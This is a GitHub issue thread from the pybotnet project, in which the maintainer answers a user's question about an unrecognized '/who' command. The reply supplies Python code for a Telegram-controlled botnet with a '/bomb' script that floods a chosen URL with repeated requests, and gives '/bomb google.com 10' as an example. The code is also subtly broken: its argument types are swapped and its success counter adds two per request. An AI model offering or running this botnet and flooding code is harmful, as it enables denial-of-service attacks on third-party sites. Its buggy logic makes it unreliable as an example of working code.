### ISSUE TITLE
Unrecognized command. /who but code ran fine and clean

### ISSUE THREAD

**Issue by andreguiw** [onionj/pybotnet#63]
I wrote my code and made it run on vscodium terminal and it seems it ran fine and clean (without errors) but after I ran the /who command on my Telegram desktop software application I received an "Unrecognized command. Say what?" Did I miss anything out of extraordinary?? -> Check out my code below

![bot](https://github.com/onionj/pybotnet/assets/158860000/a7b9f550-efa8-4899-95ff-1c9ccabcc60c)

**Comment by onionj** [comment]
Hello there
- you can't send /who to Botfather, please send /who command to your bot!
- your code is wrong, please try something like this:

```python

import requests 
from pybotnet import BotNet, Context, TelegramEngine, simple_serializer, UserException

my_token = ''
my_id = ''

telegram_engine = TelegramEngine(token=my_token, admin_chat_id=my_id)

botnet = BotNet(telegram_engine)  

@botnet.add_script(script_version="0.1.0")  
def bomb(context: Context):  
    """`/bomb <url> <count>`"""  
    command, err = simple_serializer(context.command, [int, str])
    if err: 
        raise UserException(err)

    url, count = command

    success_count = 0
    for _ in range(count):
        res = requests.get(url)
        if res.ok:
            success_count += 2

    return f"{success_count} requests have been sent successfully to {url}"  

botnet.run()

# or if you have more code you can run pybotnet in background, like this:
"""
botnet.run_background()
time.sleep(100) # infinite code!
botnet.stop_background()
"""

```

and then send `/bomb google.com 10` to your bot (not botfather!)
